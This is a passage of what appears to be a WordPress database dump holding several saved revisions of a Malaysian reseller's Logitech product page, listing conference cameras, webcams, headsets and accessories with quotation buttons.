https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p><h2 style=\"text-align: center;\">Â </h2><p style=\"text-align: center;\">Â </p><table><tbody><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech Brio</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech C9230e</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech C925e</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td colspan=\"3\" width=\"601\"><p>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech B525</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr></tbody></table><h2>Â </h2><h2 style=\"text-align: center;\">HEADSETS</h2><p style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p><h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2><table><tbody><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>SmartDock Extender Box</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>Screen Share</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>Group Expansion Mics</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Logitech SmartDock Flex</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Group 15m Extended Cable</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Group 10m Extended Cable</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td colspan=\"3\" width=\"601\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\">MeetUp Expansion Mic</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr></tbody></table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-02-15 10:03:52','2019-02-15 02:03:52','',16,'https://bintara.com.my/blog/2019/02/15/16-revision-v1/',0,'revision','',0),(2922,1,'2019-02-14 16:49:23','2019-02-14 08:49:23','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2 style=\"text-align: center;\">Â </h2><p style=\"text-align: center;\">Â </p><h2 style=\"text-align: center;\">WEBCAMS</h2><p style=\"text-align: center;\">Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p><table><tbody><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech Brio</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech C9230e</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech C925e</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td colspan=\"3\" width=\"601\"><p>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech B525</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr></tbody></table><h2>Â </h2><h2 style=\"text-align: center;\">HEADSETS</h2><p style=\"text-align: center;\">Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\"><strong>Logitech H570e Headset</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p><h2 style=\"text-align: center;\">VIDEO COLLABORATION ACCESSORIES</h2><table><tbody><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>SmartDock Extender Box</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>Screen Share</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\"><strong>Group Expansion Mics</strong></p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Logitech SmartDock Flex</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Group 15m Extended Cable</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td><td width=\"200\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" width=\"393\" height=\"393\" /></p><p style=\"text-align: center;\">Group 10m Extended Cable</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr><tr><td colspan=\"3\" width=\"601\"><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png\" alt=\"\" width=\"300\" height=\"300\" /></p><p style=\"text-align: center;\">MeetUp Expansion Mic</p><p style=\"text-align: center;\">[maxbutton id=\"3\"]</p></td></tr></tbody></table>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-02-14 16:49:23','2019-02-14 08:49:23','',16,'https://bintara.com.my/blog/2019/02/14/16-revision-v1/',0,'revision','',0),(2927,1,'2019-03-04 10:00:14','2019-03-04 02:00:14','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BRIO</h3><p>4K Ultra HD webcam with RightLightâ„¢ 3 with HDR</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C930e</h3><p>Business webcam with a wide field of view and HD digital zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C925e</h3><p>Affordable 1080p HD webcam with integrated privacy shade</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech B525</h3><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>HEADSETS</h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech H570e Headset</h3><p>Comfortable, affordable, and built to last</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<h2>VIDEO COLLABORATION ACCESSORIES</h2>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>SMARTDOCK EXTENDER BOX</h3><p>Connectivity options for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech Screen Share</h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP EXPANSION MICS</h3><p>Add-on mics for larger groups</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech SmartDock Flex</h3><p>Expansion Kit for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 15M EXTENDED CABLE</h3><p>15 meter cable for video conferences in larger rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 10M EXTENDED CABLE</h3><p>10 meter cable, ideal for large conference rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>EXPANSION MIC FOR 